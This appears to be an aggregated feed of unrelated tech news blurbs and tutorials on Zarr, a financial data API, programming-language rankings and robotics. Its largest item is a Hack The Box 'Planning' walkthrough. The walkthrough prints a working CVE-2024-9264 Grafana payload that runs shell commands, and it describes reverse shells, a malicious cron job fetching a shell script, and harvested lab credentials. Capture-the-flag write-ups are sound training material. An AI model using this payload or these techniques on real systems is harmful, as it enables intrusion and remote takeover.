I started a climate modeling project assuming I'd be dealing with "large" datasets. Then I saw the actual size: 2 terabytes. I wrote a straightforward NumPy script, hit-run, and grabbed a coffee. Bad idea. When I came back, my machine had frozen. I restarted and tried a smaller slice. Same crash. My usual workflow wasn't going to work. After some trial and error, I eventually landed on Zarr, a Python library for chunked array storage. It let me process that entire 2TB dataset on my laptop without any crashes. Here's what I learned:

Sometimes I want to test out Python statistical libraries, but I can't find any datasets. Fortunately, it's easy to get around that by generating some of my own. Here's how I do it.

I use VS Code almost every day. One thing that sticks with me about it is that it can do so much heavy lifting for you. Doing repetitive edits? Searching for files in the sidebar? Retyping the same boilerplate for the hundredth time? VS Code can ease all these for you. Let's dive in to see how.

Security researchers and penetration testers gain a comprehensive open-source reconnaissance platform with the release of Argus v2.0, a Python-based information gathering toolkit that consolidates 135 specialised modules into a unified command-line interface. The toolkit addresses the growing complexity of modern attack surface management by providing integrated access to network mapping, web application analysis, and threat […]

The post Argus: Python-Based Recon Toolkit Aims to Boost Security Intelligence appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Fundamental Data API: How to Extract Stock, ETF, Index, Mutual Fund, and Crypto Data (Step-by-Step Guide)

If you’ve ever tried to build a serious financial product, screener, dashboard, or data pipeline, you already know the uncomfortable truth:

Getting financial data is easy.
Getting reliable fundamental data is not.

Most projects start the same way:

• “Let’s pull data from Yahoo Finance.”
• “This API is free, good enough for now.”
• “We’ll fix it later.”

Then reality hits:

• Endpoints break without warning
• Scrapers get blocked
• ETFs have no holdings
• Indices have no historical constituents
• Crypto has prices but zero context

At that point, the problem is no longer technical.
It’s architectural.

That’s why choosing the right Fundamental Data API matters.

What Is a Fundamental Data API?

A Fundamental Data API provides structured, long-term financial information about assets, not just prices.

Unlike market data APIs (OHLC, ticks, volume), fundamental data answers deeper questions:

• What does this company actually do?
• How does it make money?
• What is inside this ETF?
• Which companies were in this index in the past?
• What is the real structure behind a crypto project?

What Counts as Fundamental Data?

Stocks

• Company profile (sector, industry, country)
• Financial statements (Income, Balance Sheet, Cash Flow)
• Valuation ratios (P/E, margins, ROE, ROA)
• Dividends and splits
• Market capitalization and key metrics

ETFs

• ETF metadata (issuer, category, AUM)
• Holdings and weights
• Sector and geographic exposure

Mutual Funds

• Fund profile and strategy
• Assets under management
• Financial history

Indices

• Constituents
• Weights
• Historical changes (critical for backtesting)

Crypto

• Project metadata
• Supply and market capitalization
• Official links (website, GitHub, whitepaper)
• Ecosystem statistics

What Is Derived Fundamental Data?

Derived data is what you build on top of fundamentals.

Examples:

• Fundamental scoring models
• Company or ETF rankings
• Quality or value factors
• Sector or exposure analysis

Derived data is only as good as the raw fundamental data behind it.
If the base data is inconsistent, your models will be too.

Why Popular Solutions Fail at Fundamental Data

Yahoo Finance (scraping)

• ❌ No official API
• ❌ Frequent HTML changes
• ❌ Blocking and rate limits
• ❌ Not suitable for commercial products

Trading-focused APIs (brokers)

• ❌ Built for order execution
• ❌ Limited or missing fundamentals
• ❌ Poor ETF, index, and global coverage

Alpha Vantage

• ✅ Easy to start
• ❌ Strict rate limits
• ❌ Limited ETF and index depth
• ❌ Difficult to scale for real products

These tools work for experiments, not for systems.

Why Choose EODHD APIs for Fundamental Data

This is an architectural decision, not a feature checklist.

Key Advantages

• Single fundamental endpoint for multiple asset classes
• Global market coverage, not US-only
• Consistent JSON structure, ideal for normalization
• Native crypto fundamentals via a virtual exchange (.CC)
• Designed for data products, ETL, and SaaS

EODHD APIs scale from scripts to full platforms without changing your data model.

Fundamental Data API Endpoint (Core Concept)

GET https://eodhd.com/api/fundamentals/{SYMBOL}?api_token=YOUR_API_KEY&fmt=json

Symbol examples:

• Stock: AAPL.US
• ETF: SPY.US
• Mutual fund: SWPPX.US
• Crypto: BTC-USD.CC

Python Setup (Reusable)

import requests
import os
API_KEY = os.getenv("EODHD_TOKEN")
BASE_URL = "https://eodhd.com/api"
def get_fundamentals(symbol):
    url = f"{BASE_URL}/fundamentals/{symbol}"
    r = requests.get(url, params={
        "api_token": API_KEY,
        "fmt": "json"
    })
    r.raise_for_status()
    return r.json()

How to Extract Stock Fundamental Data Using an API

stock = get_fundamentals("AAPL.US")
print(stock["General"]["Name"])
print(stock["Highlights"]["MarketCapitalization"])
print(stock["Valuation"]["TrailingPE"])

Use cases

• Stock screeners
• Valuation models
• Fundamental scoring systems

How to Extract ETF Data Using an API

ETFs require look-through analysis, not just price tracking.

etf = get_fundamentals("SPY.US")
print(etf["General"]["Name"])
print(etf["ETF_Data"]["Holdings"].keys())

Use cases

• Portfolio exposure analysis
• Backtesting without hidden bias
• Wealth and advisory platforms

How to Extract Mutual Fund Data Using an API

fund = get_fundamentals("SWPPX.US")
print(fund["General"]["Name"])

Use cases

• Fund comparison tools
• Automated reporting
• Wealth management dashboards

How to Extract Index Data Using an API

Indices are not just numbers.

Correct index analysis requires:

• Constituents
• Weights
• Historical changes

Using current constituents for past analysis introduces look-ahead bias.

Recommended workflow

1. Pull index constituents (current or historical)
2. Enrich each component with fundamentals
3. Compute derived metrics

This is essential for:

• Quant models
• Factor research
• Long-term backtesting

How to Extract Crypto Fundamental Data Using an API

Crypto fundamentals are project-level, not just price-based.

btc = get_fundamentals("BTC-USD.CC")
print(btc["General"]["Name"])
print(btc["Statistics"]["MarketCapitalization"])
print(btc["Resources"]["Links"]["source_code"])

Use cases

• Crypto research dashboards
• Project comparison tools
• Hybrid equity + crypto platforms

How to Integrate Fundamental Data Into Real Systems

Typical integrations:

• ETL → PostgreSQL, BigQuery
• Automation → n8n, Airflow
• Dashboards → Streamlit, Metabase
• Reporting → Google Sheets, Notion

Recommended architecture

1. Fetch fundamentals
2. Cache by symbol (daily or weekly)
3. Normalize only required fields
4. Compute derived metrics
5. Serve data to applications

Pros and Cons of a Professional Fundamental Data API

Pros

• Stable and structured data
• Multi-asset support
• Scales to production
• Ideal for derived analytics

Cons

• Requires data modeling
• Not a copy-paste shortcut

That’s a feature, not a drawback.

FAQs — Fundamental Data APIs

What is fundamental data?

Economic and structural information about an asset, not its price.

What is derived fundamental data?

Metrics or scores calculated from raw fundamental data.

Can I combine stocks, ETFs, indices, and crypto?

Yes. That’s one of the main strengths of EODHD APIs.

How often should I update fundamental data?

• Stocks: quarterly
• ETFs and funds: monthly
• Crypto: more frequently

Is fundamental data suitable for SaaS products?

Yes, when sourced from an official and stable API.

If you’re looking for a Fundamental Data API that lets you:

• Extract stock, ETF, mutual fund, index, and crypto data
• build reliable derived financial data
• scale from scripts to real products

Then EODHD APIs provide a clean and professional foundation.

Access the EODHD Fundamental Data API with a discount:

Fundamental Data API: How to Extract Stock, ETF, Index, Mutual Fund, and Crypto Data (Step-by-Step… was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.

A new Arcjet SDK lets Python teams embed bot protection, rate limiting, and abuse prevention directly into application code.

The post Arcjet Python SDK Sinks Teeth Into Application-Layer Security  appeared first on Security Boulevard.

Deep learning libraries are essentially sets of functions and routines written in a given programming language. A large set of deep learning libraries can make it quite simpler for data engineers, data scientists and developers to perform tasks of any complexity without having to rewrite vast lines of code. Artificial intelligence (AI) has been rapidly […]

The post 12 Most Popular Deep Learning Libraries 2026 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read more of this story at Slashdot.

Progress at your own pace through Python, Pandas, Databricks and more in these seven comprehensive courses.

The post Master Data Engineering From Beginner To Advanced For $35 appeared first on TechRepublic.

Progress at your own pace through Python, Pandas, Databricks and more in these seven comprehensive courses.

The post Master Data Engineering From Beginner To Advanced For $35 appeared first on TechRepublic.

[neos-builder] wrote in to let us know about their innovation: the HORUS Framework — Hybrid Optimized Robotics Unified System — a production-grade robotics framework built in Rust for real-time performance and memory safety.

This is a batteries included system which aims to have everything you might need available out of the box. [neos-builder] said their vision is to create a robotics framework that is “thick” as a whole (we can’t avoid this as the tools, drivers, etc. make it impossible to be slim and fit everyone’s needs), but modular by choice.

[neos-builder] goes on to say that HORUS aims to provide developers an interface where they can focus on writing algorithms and logic, not on setting up their environments and solving configuration issues and resolving DLL hell. With HORUS instead of writing one monolithic program, you build independent nodes, connected by topics, which are run by a scheduler. If you’d like to know more the documentation is extensive.

The list of features is far too long for us to repeat here, but one cool feature in addition to the real-time performance and modular design that jumped out at us was this system’s ability to process six million messages per second, sustained. That’s a lot of messages! Another neat feature is the system’s ability to “freeze” the environment, thereby assuring everyone on the team is using the same version of included components, no more “but it works on my machine!” And we should probably let you know that Python integration is a feature, connected by shared-memory inter-process communication (IPC).

If you’re interested in robotics and/or real-time systems you should definitely be aware of HORUS. Thanks to [neos-builder] for writing in about it. If you’re interested in real-time systems you might like to read Real-Time BART In A Box Smaller Than Your Coffee Mug and Real-Time Beamforming With Software-Defined Radio.

January 2026 TIOBE Index: Python stays far ahead; C strengthens at #2, Java edges past C++, C# is 2025’s winner; Delphi returns, R holds #10.

The post TIOBE Index for January 2026: C Pushes Ahead as the Chase Group Shifts Again appeared first on TechRepublic.

January 2026 TIOBE Index: Python stays far ahead; C strengthens at #2, Java edges past C++, C# is 2025’s winner; Delphi returns, R holds #10.

The post TIOBE Index for January 2026: C Pushes Ahead as the Chase Group Shifts Again appeared first on TechRepublic.

Python stays far ahead, C sits in second, Java and C++ swap places, C# rises again, and Delphi and R sit at the edge.

The post TIOBE Index for January 2026: Top 10 Most Popular Programming Languages appeared first on TechRepublic.

Introduction to Planning:

In this write-up, we will explore the “Planning” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Planning” machine from Hack The Box by achieving the following objectives:

User Flag:

During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264—a critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user “enzo,” which granted SSH access to the host system.

Root Flag:

Once on the host, I discovered the Crontab-UI service—a web-based tool for managing cron jobs—running on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the “enzo” user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.10.11.68

nmap -sC -sV -oA initial 10.10.11.68

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $nmap -sC -sV -oA initial 10.10.11.68 
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $

┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $nmap -sC -sV -oA initial 10.10.11.68 
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $

Analysis:

• Port 22 (SSH): Secure Shell service for remote access.
  
• Port 80 (HTTP): Web server running Apache.
  

Web Application Exploration:

The website for Edukate appears to be a standard educational platform.

What is Edukate?

Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.

Source: themewagon/Edukate

No usable elements are present here.

Nothing noteworthy here either.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50

gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50

Gobuster Output:

┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://planning.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        combined_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $

┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://planning.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        combined_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $

Analysis:

Discovery: grafana.planning.htb

• Gobuster found a valid virtual host: grafana.planning.htb.
• This is likely an internal service meant for the organization’s team, not a public endpoint.
• Since it contains grafana, it strongly suggests it is a Grafana dashboard instance.

Grafana Application

The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.

We should be able to log in using the credentials provided by Hack The Box.

• Username: admin
• Password: 0D5oT70Fq13EvB5r

We need to inspect the traffic using Burp Suite.

First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.

We successfully gained access to the Grafana dashboard.

We also confirmed that the Grafana instance is running version 11.0.0

There are numerous tokens being rotated here.

This is what the response looks like in Burp Suite.

Critical SQL Expression Vulnerability in Grafana Enabling Authenticated LFI/RCE

This vulnerability targets Grafana 11’s experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isn’t properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).

Grafana doesn’t include DuckDB by default. For exploitation, DuckDB must be installed on the server and accessible in Grafana’s PATH. If it’s absent, the system is safe.

Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.

Let’s search Google for potential exploits targeting Grafana v11.0.0

This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nollium’s GitHub repository.

We successfully retrieved the /etc/passwd file.

When we ran the whoami command, it returned root, which is unexpected.

Let’s set up our listener.

Unfortunately, we were unable to execute the command due to an error.

As suspected, this is running inside a Docker container.

The environment variables reveal the Grafana admin credentials:

• GF_SECURITY_ADMIN_USER=enzo
• GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.

Exploit CVE-2024-9264 using Burp Suite.

The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.

If the full path is not specified, it responds with a “Not Found” message.

However, attempting to execute the full path results in an “Unauthorized” response.

It’s still the same; we need to send the JSON data here.

After replacing the token, it worked.

{
  "from": "1729313027261",
  "queries": [
    {
      "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
      "expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |")",
      "hide": false,
      "refId": "B",
      "type": "sql",
      "window": ""
    }
  ],
  "to": "1729334627261"
}

{
  "from": "1729313027261",
  "queries": [
    {
      "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
      "expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |")",
      "hide": false,
      "refId": "B",
      "type": "sql",
      "window": ""
    }
  ],
  "to": "1729334627261"
}

This JSON payload is a crafted query sent to Grafana’s api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.

Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.

Let’s set up our listener to catch the reverse shell.

Use this SQL command to execute the bash script.

It’s hanging, which is a good sign that the payload is executing.

We successfully received a reverse shell connection.

We attempted to switch to the enzo user with su enzo, but it didn’t work.

SSH worked perfectly and allowed us to log in successfully.

We were able to read the user flag by running cat user.txt.

Escalate To Root Privileges Access

Privilege Escalation:

Locate the database file.

We discovered /opt/crrontabs/crontab.db.

The password for root_grafana is P4ssw0rdS0pRi0T3c.

Port 8000 is open here, which is unusual.

Let’s set up port forwarding for port 8000.

We need to provide the credentials to log in.

We need to use the credentials we discovered earlier to log in.

It turned out to be a cron jobs management interface.

What is Cronjob-UI?

Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.

We need to create a new cron job command.

The shell.sh file contains the reverse shell that will connect back to us.

We will use curl to fetch the file, as demonstrated earlier.

The file was transferred successfully, as expected.

We were able to access the root shell and read the root flag by running cat root.txt.

The post Hack The Box: Planning Machine Walkthrouh – Easy Diffucilty appeared first on Threatninja.net.

Python stays far ahead, C sits in second, Java and C++ swap places, C# rises again, and Delphi and R sit at the edge.

The post TIOBE Index for January 2026: Top 10 Most Popular Programming Languages appeared first on TechRepublic.

Everyone knows that I am not a programmer, but yesterday was a holiday in my country and I was doing some tidying up of my notes and todo lists, and one entry was quite old and I thought, ok, it is probably time to complete this task. Holy moly, but how does that relate to programming? Let’s start at the beginning.